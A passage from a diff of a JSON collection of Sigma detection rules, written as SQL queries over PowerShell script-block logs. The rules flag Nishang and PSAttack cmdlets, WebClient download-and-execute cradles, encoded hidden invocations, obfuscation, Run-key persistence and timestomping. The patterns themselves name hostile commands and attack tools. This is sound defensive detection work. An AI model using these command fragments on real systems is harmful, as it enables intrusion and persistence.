ScriptBlockText LIKE '%Invoke-MimikatzWDigestDowngrade%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-NetworkRelay%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PowerShellIcmp%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PowerShellUdp%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Prasadhak%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PSGcat%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PsGcatAgent%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SessionGopher%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SSIDExfil%' ESCAPE '\\' OR ScriptBlockText LIKE '%LoggedKeys%' ESCAPE '\\' OR ScriptBlockText LIKE '%Nishang%' ESCAPE '\\' OR ScriptBlockText LIKE '%NotAllNameSpaces%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-CHM%' ESCAPE 
'\\' OR ScriptBlockText LIKE '%OUT-DNSTXT%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-HTA%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-RundllCommand%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-SCF%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-SCT%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-Shortcut%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-WebQuery%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-Word%' ESCAPE '\\' OR ScriptBlockText LIKE '%Parse\\_Keys%' ESCAPE '\\' OR ScriptBlockText LIKE '%Password-List%' ESCAPE '\\' OR ScriptBlockText LIKE '%Powerpreter%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-Persistence%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-PoshRat%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-Update%' ESCAPE '\\' OR ScriptBlockText LIKE '%Run-EXEonRemote%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-DCShadowPermissions%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-RemotePSRemoting%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-RemoteWMI%' ESCAPE '\\' OR ScriptBlockText LIKE '%Shellcode32%' ESCAPE '\\' OR ScriptBlockText LIKE '%Shellcode64%' ESCAPE '\\' OR ScriptBlockText LIKE '%StringtoBase64%' ESCAPE '\\' OR ScriptBlockText LIKE '%TexttoExe%' ESCAPE '\\'))" ], - "filename": "posh_ps_invoke_command_remote.yml" + "filename": "posh_ps_nishang_malicious_commandlets.yml" }, { - "title": "Suspicious PowerShell Invocations - Generic", - "id": "ed965133-513f-41d9-a441-e38076a0798f", + "title": "PowerShell PSAttack", + "id": "b7ec41a4-042c-4f31-a5db-d0fcde9fa5c5", "status": "test", - "description": "Detects suspicious PowerShell invocation command parameters", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the use of PSAttack PowerShell hack tool", + "author": "Sean Metcalf (source), Florian Roth (Nextron Systems)", "tags": [ "attack.execution", "attack.t1059.001" ], "falsepositives": [ - "Very special / sneaky PowerShell scripts" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN 
('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '% -enc %' ESCAPE '\\' OR ScriptBlockText LIKE '% -EncodedCommand %' ESCAPE '\\' OR ScriptBlockText LIKE '% -ec %' ESCAPE '\\') AND (ScriptBlockText LIKE '% -w hidden %' ESCAPE '\\' OR ScriptBlockText LIKE '% -window hidden %' ESCAPE '\\' OR ScriptBlockText LIKE '% -windowstyle hidden %' ESCAPE '\\' OR ScriptBlockText LIKE '% -w 1 %' ESCAPE '\\') AND (ScriptBlockText LIKE '% -noni %' ESCAPE '\\' OR ScriptBlockText LIKE '% -noninteractive %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%PS ATTACK!!!%' ESCAPE '\\')" ], - "filename": "posh_ps_susp_invocation_generic.yml" + "filename": "posh_ps_psattack.yml" }, { - "title": "Usage Of Web Request Commands And Cmdlets - ScriptBlock", - "id": "1139d2e2-84b1-4226-b445-354492eba8ba", - "status": "experimental", - "description": "Detects the use of various web request commands with commandline tools and Windows PowerShell cmdlets (including aliases) via PowerShell scriptblock logs", - "author": "James Pemberton / @4A616D6573", + "title": "Powershell Directory Enumeration", + "id": "162e69a7-7981-4344-84a9-0f1c9a217a52", + "status": "test", + "description": "Detects technique used by MAZE ransomware to enumerate directories using Powershell", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.discovery", + "attack.t1083" ], "falsepositives": [ - "Use of Get-Command and Get-Help modules to reference Invoke-WebRequest and Start-BitsTransfer." 
+ "Legitimate PowerShell scripts" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%Invoke-WebRequest%' ESCAPE '\\' OR ScriptBlockText LIKE '%iwr %' ESCAPE '\\' OR ScriptBlockText LIKE '%wget %' ESCAPE '\\' OR ScriptBlockText LIKE '%curl %' ESCAPE '\\' OR ScriptBlockText LIKE '%Net.WebClient%' ESCAPE '\\' OR ScriptBlockText LIKE '%Start-BitsTransfer%' ESCAPE '\\' OR ScriptBlockText LIKE '%Resume-BitsTransfer%' ESCAPE '\\' OR ScriptBlockText LIKE '%[System.Net.WebRequest]::create%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-RestMethod%' ESCAPE '\\' OR ScriptBlockText LIKE '%WinHttp.WinHttpRequest%' ESCAPE '\\') AND NOT (Path LIKE 'C:\\\\Packages\\\\Plugins\\\\Microsoft.GuestConfiguration.ConfigurationforWindows\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%foreach%' ESCAPE '\\' AND ScriptBlockText LIKE '%Get-ChildItem%' ESCAPE '\\' AND ScriptBlockText LIKE '%-Path %' ESCAPE '\\' AND ScriptBlockText LIKE '%-ErrorAction %' ESCAPE '\\' AND ScriptBlockText LIKE '%SilentlyContinue%' ESCAPE '\\' AND ScriptBlockText LIKE '%Out-File %' ESCAPE '\\' AND ScriptBlockText LIKE '%-append%' ESCAPE '\\')" ], - "filename": "posh_ps_web_request_cmd_and_cmdlets.yml" + "filename": "posh_ps_susp_directory_enum.yml" }, { - "title": "Silence.EDA Detection", - "id": "3ceb2083-a27f-449a-be33-14ec1b7cc973", + "title": "Powershell File and Directory Discovery", + "id": "d23f2ba5-9da0-4463-8908-8ee47f614bb9", "status": "test", - "description": "Detects Silence EmpireDNSAgent as described in the Group-IP report", - "author": "Alina Stepchenkova, Group-IB, oscd.community", + "description": "Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain 
information within a file system.\nAdversaries may use the information from [File and Directory Discovery](https://attack.mitre.org/techniques/T1083) during automated discovery to shape follow-on behaviors,\nincluding whether or not the adversary fully infects the target and/or attempts specific actions.\n", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1059.001", - "attack.command_and_control", - "attack.t1071.004", - "attack.t1572", - "attack.impact", - "attack.t1529", - "attack.g0091", - "attack.s0363" + "attack.discovery", + "attack.t1083" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%System.Diagnostics.Process%' ESCAPE '\\' AND ScriptBlockText LIKE '%Stop-Computer%' ESCAPE '\\' AND ScriptBlockText LIKE '%Restart-Computer%' ESCAPE '\\' AND ScriptBlockText LIKE '%Exception in execution%' ESCAPE '\\' AND ScriptBlockText LIKE '%$cmdargs%' ESCAPE '\\' AND ScriptBlockText LIKE '%Close-Dnscat2Tunnel%' ESCAPE '\\' AND ScriptBlockText LIKE '%set type=$LookupType`nserver%' ESCAPE '\\' AND ScriptBlockText LIKE '%$Command | nslookup 2>&1 | Out-String%' ESCAPE '\\' AND ScriptBlockText LIKE '%New-RandomDNSField%' ESCAPE '\\' AND ScriptBlockText LIKE '%[Convert]::ToString($SYNOptions, 16)%' ESCAPE '\\' AND ScriptBlockText LIKE '%$Session.Dead = $True%' ESCAPE '\\' AND ScriptBlockText LIKE '%$Session[\"Driver\"] -eq%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%ls%' ESCAPE '\\' OR ScriptBlockText LIKE '%get-childitem%' ESCAPE '\\' OR ScriptBlockText LIKE '%gci%' ESCAPE '\\') AND ScriptBlockText LIKE '%-recurse%' ESCAPE '\\')" ], - "filename": "posh_ps_apt_silence_eda.yml" + "filename": "posh_ps_file_and_directory_discovery.yml" }, { - "title": 
"Invoke-Obfuscation Via Use Rundll32 - PowerShell", - "id": "a5a30a6e-75ca-4233-8b8c-42e0f2037d3b", + "title": "Suspicious PowerShell Invocations - Specific", + "id": "ae7fbf8e-f3cb-49fd-8db4-5f3bed522c71", "status": "experimental", - "description": "Detects Obfuscated Powershell via use Rundll32 in Scripts", - "author": "Nikita Nazarov, oscd.community", + "description": "Detects suspicious PowerShell invocation command parameters", + "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro", "tags": [ - "attack.defense_evasion", - "attack.t1027", "attack.execution", "attack.t1059.001" ], 
@@ -7233,361 +6777,380 @@ ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%&&%' ESCAPE '\\' AND ScriptBlockText LIKE '%rundll32%' ESCAPE '\\' AND ScriptBlockText LIKE '%shell32.dll%' ESCAPE '\\' AND ScriptBlockText LIKE '%shellexec\\_rundll%' ESCAPE '\\' AND (ScriptBlockText LIKE '%value%' ESCAPE '\\' OR ScriptBlockText LIKE '%invoke%' ESCAPE '\\' OR ScriptBlockText LIKE '%comspec%' ESCAPE '\\' OR ScriptBlockText LIKE '%iex%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ScriptBlockText LIKE '%-nop%' ESCAPE '\\' AND ScriptBlockText LIKE '% -w %' ESCAPE '\\' AND ScriptBlockText LIKE '%hidden%' ESCAPE '\\' AND ScriptBlockText LIKE '% -c %' ESCAPE '\\' AND ScriptBlockText LIKE '%[Convert]::FromBase64String%' ESCAPE '\\') OR (ScriptBlockText LIKE '% -w %' ESCAPE '\\' AND ScriptBlockText LIKE '%hidden%' ESCAPE '\\' AND ScriptBlockText LIKE '%-noni%' ESCAPE '\\' AND ScriptBlockText LIKE '%-nop%' ESCAPE '\\' AND ScriptBlockText LIKE '% -c %' ESCAPE '\\' AND ScriptBlockText LIKE '%iex%' ESCAPE '\\' AND ScriptBlockText LIKE '%New-Object%' ESCAPE '\\') OR (ScriptBlockText LIKE '% -w %' ESCAPE '\\' AND ScriptBlockText LIKE '%hidden%' ESCAPE '\\' AND ScriptBlockText LIKE '%-ep%' ESCAPE '\\' AND ScriptBlockText LIKE '%bypass%' ESCAPE '\\' AND ScriptBlockText LIKE '%-Enc%' ESCAPE '\\') OR (ScriptBlockText LIKE '%powershell%' ESCAPE '\\' AND ScriptBlockText LIKE '%reg%' ESCAPE '\\' AND ScriptBlockText LIKE '%add%' ESCAPE '\\' AND ScriptBlockText LIKE '%HKCU\\\\software\\\\microsoft\\\\windows\\\\currentversion\\\\run%' ESCAPE '\\') OR (ScriptBlockText LIKE '%bypass%' ESCAPE '\\' AND ScriptBlockText LIKE '%-noprofile%' ESCAPE '\\' AND ScriptBlockText LIKE '%-windowstyle%' ESCAPE '\\' AND ScriptBlockText LIKE '%hidden%' ESCAPE 
'\\' AND ScriptBlockText LIKE '%new-object%' ESCAPE '\\' AND ScriptBlockText LIKE '%system.net.webclient%' ESCAPE '\\' AND ScriptBlockText LIKE '%.download%' ESCAPE '\\') OR (ScriptBlockText LIKE '%iex%' ESCAPE '\\' AND ScriptBlockText LIKE '%New-Object%' ESCAPE '\\' AND ScriptBlockText LIKE '%Net.WebClient%' ESCAPE '\\' AND ScriptBlockText LIKE '%.Download%' ESCAPE '\\')) AND NOT (((ScriptBlockText LIKE '%(New-Object System.Net.WebClient).DownloadString(''https://community.chocolatey.org/install.ps1%' ESCAPE '\\' OR ScriptBlockText LIKE '%(New-Object System.Net.WebClient).DownloadString(''https://chocolatey.org/install.ps1'')%' ESCAPE '\\' OR ScriptBlockText LIKE '%Write-ChocolateyWarning%' ESCAPE '\\'))))" ], - "filename": "posh_ps_invoke_obfuscation_via_use_rundll32.yml" + "filename": "posh_ps_susp_invocation_specific.yml" }, { - "title": "DirectorySearcher Powershell Exploitation", - "id": "1f6399cf-2c80-4924-ace1-6fcff3393480", - "status": "test", - "description": "Enumerates Active Directory to determine computers that are joined to the domain", + "title": "Potential COM Objects Download Cradles Usage - PS Script", + "id": "3c7d1587-3b13-439f-9941-7d14313dbdfe", + "status": "experimental", + "description": "Detects usage of COM objects that can be abused to download files in PowerShell by CLSID", "author": "frack113", - "tags": [ - "attack.discovery", - "attack.t1018" - ], "falsepositives": [ - "Unknown" + "Legitimate use of the library" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%New-Object %' ESCAPE '\\' AND ScriptBlockText LIKE '%System.DirectoryServices.DirectorySearcher%' ESCAPE '\\' AND ScriptBlockText LIKE '%.PropertiesToLoad.Add%' ESCAPE '\\' AND ScriptBlockText LIKE '%.findall()%' ESCAPE '\\' AND ScriptBlockText LIKE '%Properties.name%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND 
Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%[Type]::GetTypeFromCLSID(%' ESCAPE '\\' AND (ScriptBlockText LIKE '%0002DF01-0000-0000-C000-000000000046%' ESCAPE '\\' OR ScriptBlockText LIKE '%F6D90F16-9C73-11D3-B32E-00C04F990BB4%' ESCAPE '\\' OR ScriptBlockText LIKE '%F5078F35-C551-11D3-89B9-0000F81FE221%' ESCAPE '\\' OR ScriptBlockText LIKE '%88d96a0a-f192-11d4-a65f-0040963251e5%' ESCAPE '\\' OR ScriptBlockText LIKE '%AFBA6B42-5692-48EA-8141-DC517DCF0EF1%' ESCAPE '\\' OR ScriptBlockText LIKE '%AFB40FFD-B609-40A3-9828-F88BBE11E4E3%' ESCAPE '\\' OR ScriptBlockText LIKE '%88d96a0b-f192-11d4-a65f-0040963251e5%' ESCAPE '\\' OR ScriptBlockText LIKE '%2087c2f4-2cef-4953-a8ab-66779b670495%' ESCAPE '\\' OR ScriptBlockText LIKE '%000209FF-0000-0000-C000-000000000046%' ESCAPE '\\' OR ScriptBlockText LIKE '%00024500-0000-0000-C000-000000000046%' ESCAPE '\\'))" ], - "filename": "posh_ps_directorysearcher.yml" + "filename": "posh_ps_download_com_cradles.yml" }, { - "title": "Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - PowerShell", - "id": "e54f5149-6ba3-49cf-b153-070d24679126", + "title": "Potential PowerShell Obfuscation Using Alias Cmdlets", + "id": "96cd126d-f970-49c4-848a-da3a09f55c55", "status": "experimental", - "description": "Detects Obfuscated Powershell via VAR++ LAUNCHER", - "author": "Timur Zinniatullin, oscd.community", + "description": "Detects Set-Alias or New-Alias cmdlet usage. 
Which can be use as a mean to obfuscate PowerShell scripts", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1027", "attack.execution", + "attack.t1027", "attack.t1059.001" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText REGEXP '(?i).*&&set.*(\\{\\d\\}){2,}\\\\\"\\s+?-f.*&&.*cmd.*/c')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Set-Alias %' ESCAPE '\\' OR ScriptBlockText LIKE '%New-Alias %' ESCAPE '\\'))" ], - "filename": "posh_ps_invoke_obfuscation_via_var.yml" + "filename": "posh_ps_susp_set_alias.yml" }, { - "title": "Enable Windows Remote Management", - "id": "991a9744-f2f0-44f2-bd33-9092eba17dc3", - "status": "test", - "description": "Adversaries may use Valid Accounts to interact with remote systems using Windows Remote Management (WinRM). 
The adversary may then perform actions as the logged-on user.", + "title": "Powershell Token Obfuscation - Powershell", + "id": "f3a98ce4-6164-4dd4-867c-4d83de7eca51", + "status": "experimental", + "description": "Detects TOKEN OBFUSCATION technique from Invoke-Obfuscation", "author": "frack113", "tags": [ - "attack.lateral_movement", - "attack.t1021.006" + "attack.defense_evasion", + "attack.t1027.009" ], "falsepositives": [ - "Legitimate script" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Enable-PSRemoting %' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText REGEXP '\\w+`(\\w+|-|.)`[\\w+|\\s]' OR ScriptBlockText REGEXP '\"(\\{\\d\\}){2,}\"\\s*-f' OR ScriptBlockText REGEXP '\\$\\{((e|n|v)*`(e|n|v)*)+:path\\}|\\$\\{((e|n|v)*`(e|n|v)*)+:((p|a|t|h)*`(p|a|t|h)*)+\\}|\\$\\{env:((p|a|t|h)*`(p|a|t|h)*)+\\}') AND NOT (((ScriptBlockText LIKE '%it will return true or false instead%' ESCAPE '\\' OR ScriptBlockText LIKE '%The function also prevents `Get-ItemProperty` from failing%' ESCAPE '\\')) OR (Path LIKE 'C:\\\\Program Files\\\\Microsoft\\\\Exchange Server\\\\%' ESCAPE '\\' AND Path LIKE '%\\\\bin\\\\servicecontrol.ps1' ESCAPE '\\' AND ScriptBlockText LIKE '%`r`n%' ESCAPE '\\')))" ], - "filename": "posh_ps_enable_psremoting.yml" + "filename": "posh_ps_token_obfuscation.yml" }, { - "title": "Code Executed Via Office Add-in XLL File", - "id": "36fbec91-fa1b-4d5d-8df1-8d8edcb632ad", - "status": "test", - "description": "Adversaries may abuse Microsoft Office add-ins to obtain persistence on a compromised system.\nOffice add-ins can be used to add functionality to Office programs\n", - "author": "frack113", + "title": "AADInternals PowerShell Cmdlets Execution - PsScript", 
+ "id": "91e69562-2426-42ce-a647-711b8152ced6", + "status": "experimental", + "description": "Detects ADDInternals Cmdlet execution. A tool for administering Azure AD and Office 365. Which can be abused by threat actors to attack Azure AD or Office 365.", + "author": "Austin Songer (@austinsonger), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1137.006" + "attack.execution", + "attack.reconnaissance", + "attack.discovery", + "attack.credential_access", + "attack.impact" ], "falsepositives": [ - "Unknown" + "Legitimate use of the library for administrative activity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%new-object %' ESCAPE '\\' AND ScriptBlockText LIKE '%-ComObject %' ESCAPE '\\' AND ScriptBlockText LIKE '%.application%' ESCAPE '\\' AND ScriptBlockText LIKE '%.RegisterXLL%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Add-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%ConvertTo-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Disable-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Enable-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Export-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Grant-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Install-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Join-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Open-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Read-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Register-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Restore-AADInt%' ESCAPE '\\' OR 
ScriptBlockText LIKE '%Search-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Send-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Start-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Update-AADInt%' ESCAPE '\\'))" ], - "filename": "posh_ps_office_comobject_registerxll.yml" + "filename": "posh_ps_aadinternals_cmdlets_execution.yml" }, { - "title": "Modify Group Policy Settings - ScriptBlockLogging", - "id": "b7216a7d-687e-4c8d-82b1-3080b2ad961f", - "status": "experimental", - "description": "Detect malicious GPO modifications can be used to implement many other malicious behaviors.", + "title": "Powershell Suspicious Win32_PnPEntity", + "id": "b26647de-4feb-4283-af6b-6117661283c5", + "status": "test", + "description": "Adversaries may attempt to gather information about attached peripheral devices and components connected to a computer system.", "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1484.001" + "attack.discovery", + "attack.t1120" ], "falsepositives": [ - "Legitimate use" + "Admin script" ], - "level": "medium", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System%' ESCAPE '\\' AND (ScriptBlockText LIKE '%GroupPolicyRefreshTimeDC%' ESCAPE '\\' OR ScriptBlockText LIKE '%GroupPolicyRefreshTimeOffsetDC%' ESCAPE '\\' OR ScriptBlockText LIKE '%GroupPolicyRefreshTime%' ESCAPE '\\' OR ScriptBlockText LIKE '%GroupPolicyRefreshTimeOffset%' ESCAPE '\\' OR ScriptBlockText LIKE '%EnableSmartScreen%' ESCAPE '\\' OR ScriptBlockText LIKE '%ShellSmartScreenLevel%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Win32\\_PnPEntity%' ESCAPE '\\')" ], 
- "filename": "posh_ps_modify_group_policy_settings.yml" + "filename": "posh_ps_susp_win32_pnpentity.yml" }, { - "title": "Registry-Free Process Scope COR_PROFILER", - "id": "23590215-4702-4a70-8805-8dc9e58314a2", + "title": "Replace Desktop Wallpaper by Powershell", + "id": "c5ac6a1e-9407-45f5-a0ce-ca9a0806a287", "status": "test", - "description": "Adversaries may leverage the COR_PROFILER environment variable to hijack the execution flow of programs that load the .NET CLR.\nThe COR_PROFILER is a .NET Framework feature which allows developers to specify an unmanaged (or external of .NET) profiling DLL to be loaded into each .NET process that loads the Common Language Runtime (CLR).\nThese profiliers are designed to monitor, troubleshoot, and debug managed code executed by the .NET CLR.\n(Citation: Microsoft Profiling Mar 2017)\n(Citation: Microsoft COR_PROFILER Feb 2013)\n", + "description": "An adversary may deface systems internal to an organization in an attempt to intimidate or mislead users.\nThis may take the form of modifications to internal websites, or directly to user systems with the replacement of the desktop wallpaper\n", "author": "frack113", "tags": [ - "attack.persistence", - "attack.t1574.012" + "attack.impact", + "attack.t1491.001" ], "falsepositives": [ - "Legitimate administrative script" + "Unknown" ], - "level": "medium", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%$env:COR\\_ENABLE\\_PROFILING%' ESCAPE '\\' AND ScriptBlockText LIKE '%$env:COR\\_PROFILER%' ESCAPE '\\' AND ScriptBlockText LIKE '%$env:COR\\_PROFILER\\_PATH%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ScriptBlockText LIKE '%Get-ItemProperty%' ESCAPE '\\' AND ScriptBlockText LIKE '%Registry::%' ESCAPE '\\' AND 
ScriptBlockText LIKE '%HKEY\\_CURRENT\\_USER\\\\Control Panel\\\\Desktop\\\\%' ESCAPE '\\' AND ScriptBlockText LIKE '%WallPaper%' ESCAPE '\\') OR ScriptBlockText LIKE '%SystemParametersInfo(20,0,%,3)%' ESCAPE '\\'))" ], - "filename": "posh_ps_cor_profiler.yml" + "filename": "posh_ps_susp_wallpaper.yml" }, { - "title": "Powershell Timestomp", - "id": "c6438007-e081-42ce-9483-b067fbef33c3", + "title": "Powershell Execute Batch Script", + "id": "b5522a23-82da-44e5-9c8b-e10ed8955f88", "status": "test", - "description": "Adversaries may modify file time attributes to hide new or changes to existing files.\nTimestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder.\n", + "description": "Adversaries may abuse the Windows command shell for execution.\nThe Windows command shell ([cmd](https://attack.mitre.org/software/S0106)) is the primary command prompt on Windows systems.\nThe Windows command prompt can be used to control almost any aspect of a system, with various permission levels required for different subsets of commands.\nBatch files (ex: .bat or .cmd) also provide the shell with a list of sequential commands to run, as well as normal scripting operations such as conditionals and loops.\nCommon uses of batch files include long or repetitive tasks, or the need to run the same set of commands on multiple system\n", "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1070.006" + "attack.execution", + "attack.t1059.003" ], "falsepositives": [ - "Legitimate admin script" + "Legitimate administration script" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%.CreationTime =%' ESCAPE '\\' OR ScriptBlockText LIKE '%.LastWriteTime =%' ESCAPE '\\' OR ScriptBlockText LIKE '%.LastAccessTime =%' ESCAPE '\\' OR 
ScriptBlockText LIKE '%[IO.File]::SetCreationTime%' ESCAPE '\\' OR ScriptBlockText LIKE '%[IO.File]::SetLastAccessTime%' ESCAPE '\\' OR ScriptBlockText LIKE '%[IO.File]::SetLastWriteTime%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Start-Process%' ESCAPE '\\' AND (ScriptBlockText LIKE '%.cmd%' ESCAPE '\\' OR ScriptBlockText LIKE '%.bat%' ESCAPE '\\'))" ], - "filename": "posh_ps_timestomp.yml" + "filename": "posh_ps_susp_execute_batch_script.yml" }, { - "title": "Suspicious Start-Process PassThru", - "id": "0718cd72-f316-4aa2-988f-838ea8533277", + "title": "PowerShell Create Local User", + "id": "243de76f-4725-4f2e-8225-a8a69b15ad61", "status": "test", - "description": "Powershell use PassThru option to start in background", - "author": "frack113", + "description": "Detects creation of a local user via PowerShell", + "author": "@ROxPinTeddy", "tags": [ - "attack.defense_evasion", - "attack.t1036.003" + "attack.execution", + "attack.t1059.001", + "attack.persistence", + "attack.t1136.001" ], "falsepositives": [ - "Legitimate PowerShell scripts" + "Legitimate user creation" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Start-Process%' ESCAPE '\\' AND ScriptBlockText LIKE '%-PassThru %' ESCAPE '\\' AND ScriptBlockText LIKE '%-FilePath %' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%New-LocalUser%' ESCAPE '\\')" ], - "filename": "posh_ps_susp_start_process.yml" + "filename": "posh_ps_create_local_user.yml" }, { - "title": "Powershell Trigger Profiles by Add_Content", - "id": "05b3e303-faf0-4f4a-9b30-46cc13e69152", - "status": "test", - "description": 
